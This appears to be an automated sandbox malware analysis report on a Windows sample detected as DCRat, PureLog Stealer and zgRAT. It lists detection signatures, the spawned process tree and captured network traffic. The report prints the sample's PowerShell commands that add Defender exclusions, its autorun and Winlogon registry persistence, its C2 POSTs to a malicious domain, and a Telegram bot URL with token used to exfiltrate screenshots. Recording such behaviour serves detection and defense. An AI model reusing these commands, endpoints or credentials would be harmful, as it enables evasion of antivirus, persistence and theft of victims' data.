Windows Analysis Report
W4tW72sfAD.exe

Overview

General Information

Sample name:W4tW72sfAD.exe
renamed because original name is a hash value
Original sample name:9026338FCE277581062754CAB87462E7.exe
Analysis ID:1428727
MD5:9026338fce277581062754cab87462e7
SHA1:191b8d92c18b84fdef03f691583d8b89598cb7da
SHA256:5565710131f195b46fb7c0b124d16df72ec5e0aafdd22590eaff7885aead636f
Tags:DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • W4tW72sfAD.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\W4tW72sfAD.exe" MD5: 9026338FCE277581062754CAB87462E7)
    • csc.exe (PID: 4080 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2708 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 5104 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3668 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7140 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7248 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7556 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7660 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7760 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • RuntimeBroker.exe (PID: 6348 cmdline: C:\Users\Public\Downloads\RuntimeBroker.exe MD5: 9026338FCE277581062754CAB87462E7)
  • RuntimeBroker.exe (PID: 5100 cmdline: C:\Users\Public\Downloads\RuntimeBroker.exe MD5: 9026338FCE277581062754CAB87462E7)
  • RuntimeBroker.exe (PID: 7680 cmdline: "C:\Users\Public\Downloads\RuntimeBroker.exe" MD5: 9026338FCE277581062754CAB87462E7)
  • juptXkyeRvGsIZrQGeVEsrnWhD.exe (PID: 8076 cmdline: "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe" MD5: 9026338FCE277581062754CAB87462E7)
    • cmd.exe (PID: 6176 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RuntimeBroker.exe (PID: 2032 cmdline: "C:\Users\Public\Downloads\RuntimeBroker.exe" MD5: 9026338FCE277581062754CAB87462E7)
  • RuntimeBroker.exe (PID: 2792 cmdline: "C:\Users\Public\Downloads\RuntimeBroker.exe" MD5: 9026338FCE277581062754CAB87462E7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
W4tW72sfAD.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
W4tW72sfAD.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: W4tW72sfAD.exe PID: 6988 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.W4tW72sfAD.exe.a10000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.W4tW72sfAD.exe.a10000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                          System Summary

                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Downloads\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Downloads\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Downloads\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, ProcessId: 6348, ProcessName: RuntimeBroker.exe
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetFilename: C:\Users\Public\Downloads\RuntimeBroker.exe
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Downloads\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', ProcessId: 5104, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Downloads\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Downloads\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Downloads\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Downloads\RuntimeBroker.exe, ProcessId: 6348, ProcessName: RuntimeBroker.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\juptXkyeRvGsIZrQGeVEsrnWhD
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", ProcessId: 4080, ProcessName: csc.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', ProcessId: 5104, ProcessName: powershell.exe
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\W4tW72sfAD.exe, ProcessId: 6988, TargetFilename: C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe', ProcessId: 5104, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7880, ProcessName: svchost.exe

                          Data Obfuscation

                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\W4tW72sfAD.exe", ParentImage: C:\Users\user\Desktop\W4tW72sfAD.exe, ParentProcessId: 6988, ParentProcessName: W4tW72sfAD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline", ProcessId: 4080, ProcessName: csc.exe
                          Timestamp:04/19/24-13:42:33.224120
                          SID:2048095
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          AV Detection

                          Source: W4tW72sfAD.exeAvira: detected
                          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\AppData\Local\Temp\9x00cPKFqM.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\GNRoGDmH.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\EkAnmMVM.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\user\Desktop\BazpdGXT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeReversingLabs: Detection: 68%
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\BazpdGXT.logReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\EkAnmMVM.logReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\NEEtYbtY.logReversingLabs: Detection: 66%
                          Source: W4tW72sfAD.exeReversingLabs: Detection: 68%
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\BuKwfPUT.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exeJoe Sandbox ML: detected
                          Source: W4tW72sfAD.exeJoe Sandbox ML: detected
                          Source: W4tW72sfAD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
                          Source: W4tW72sfAD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

                          Spreading

                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B890356h19_2_00007FFD9B89014E
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B890356h20_2_00007FFD9B89014E
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B8B0356h21_2_00007FFD9B8B014E
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B890356h22_2_00007FFD9B89014E
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B8A0356h38_2_00007FFD9B8A014E
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9B8B0356h41_2_00007FFD9B8B014E
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 4x nop then jmp 00007FFD9B890356h44_2_00007FFD9B89014E

                          Networking

                          Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.57.61:80
                          Source: DNS query: minecrafthyipixel.xyz
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: unknownDNS query: name: api.telegram.org
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: global trafficHTTP traffic detected: POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2"Host: api.telegram.orgContent-Length: 100984Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                          Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                          Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: ipinfo.io
                          Source: unknownDNS query: name: ipinfo.io
                          Source: unknownDNS query: name: ipinfo.io
                          Source: unknownDNS query: name: ipinfo.io
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 376Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 1876Expect: 100-continue
